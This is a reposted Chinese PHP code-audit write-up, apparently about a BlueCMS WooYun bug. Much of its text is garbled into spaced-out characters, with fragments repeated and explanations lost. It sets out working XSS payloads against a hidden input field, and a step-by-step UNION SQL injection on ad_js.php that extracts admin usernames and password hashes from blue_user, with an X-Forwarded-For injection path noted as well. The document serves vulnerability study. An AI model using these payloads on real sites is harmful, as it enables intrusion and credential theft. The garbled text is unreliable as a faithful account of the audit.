[2063] 2021-03-09_PHP代码审计wooyun-2010-00141

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-16
2021-03-09_PHP代码审计wooyun-2010-00141 P H P   w o o y u n - 2 0 1 0 - 0 0 1 4 1   d o n 9   d o n 9 s e c   2 0 2 1 - 0 3 - 0 9   #   , 8 X S S X S S / u s e r . p h p ? a c t = r e g & f r o m = p a y l o a d < s c r i p t > a l e r t ( 1 ) < s c r i p t > 姿 i n p u t , p a y l o a d < i n p u t   t y p e = " h i d d e n "   n a m e = " f r o m "   v a l u e = " " > < s c r i p t > a l e r t ( 2 0 2 1 ) < / s c r i p t >
h i d d e n     h i d d e n t e x t ( s r c ) h i d d e n s h i f t + a l t + a c c e s s k e y , X S S #   < i n p u t   t y p e = " h i d d e n "   n a m e = " f r o m "   v a l u e = " 1 "   o n m o u s e o v e r = " a l e r t ( 1 ) "   " " = " " > #   h i d d e n t y p e h i d d e n < i n p u t   v a l u e = ' a '   s r c = 1   o n e r r o r = a l e r t ( 1 )   t y p e = " i m a g e "   t y p e = " h i d d e n " > #   h i d d e n s h i f t + a l t + a c c e s s k e y < i n p u t   v a l u e = ' a '   t y p e = " h i d d e n "   a c c e s s k e y = " x "   o n c l i c k = a l e r t ( 1 ) >
x s s , p a y l o a d , b u r p e m a i l < s c r i p t > a l e r t ( 2 0 2 1 ) < / s c r i p t >
p a y l o a d a d m i n
S Q L s q l s e a y f o t i f y s e a y : f o t i f y : s q l / a d _ j s . p h p s e a y
  / i n c l u d e / c o m m o n . i n c . p h p , 使 a d d s l a s h e s $ a d _ i d s q l g e t o n e ( ) $ a d   =   $ d b - > g e t o n e ( " S E L E C T   *   F R O M   " . t a b l e ( ' a d ' ) . "   W H E R E   a d _ i d   = " . $ a d _ i d ) ;
S Q L 1 .   2 .   7 3 .     7 p a y l o a d 4 .   5 .   6 .   b l u e _ u s e r ? a d i d = 1   o r d e r   b y   7   # ? a d i d = 1   o r d e r   b y   8   # ? a d _ i d = 1   u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , 7 ? a d _ i d = 1   u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , d a t a b a s e ( ) ? a d _ i d = 1   u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , @ @ v e r s i o n ? a d _ i d = 1   u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) ? a d _ i d = 1   u n i o n   s e l e c t     1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' b l u e _ u s e r '
a d d l a s h e s 1 6 7 .   u s e r _ n a m e , p w d ,   / g u e s t _ b o o k . p h p   X F F $ i p i p g u e s t _ b o o k . p h p $ o n l i n e _ i p g e t i p ( ) f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' b l u e _ u s e r ' ? a d _ i d = 1   u n i o n   s e l e c t     1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = 0 x 6 2 6 c 7 5 6 5 5 f 6 1 6 4 6 d 6 9 6 e ? a d _ i d = 1 u n i o n   s e l e c t   1 , 2 , 3 , 4 , 5 , 6 , g r o u p _ c o n c a t ( u s e r _ n a m e , 0 x 3 a , p w d )   f r o m   b l u e _ u s e r
h t t p s : / / w w w . o n e b u g . o r g / b u g / 2 9 4 . h t m l X - F o r w a r d e d - F o r   - >   g e t i p ( )   - >   $ o n l i n e _ i p   - >   i p   - >   $ s q l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则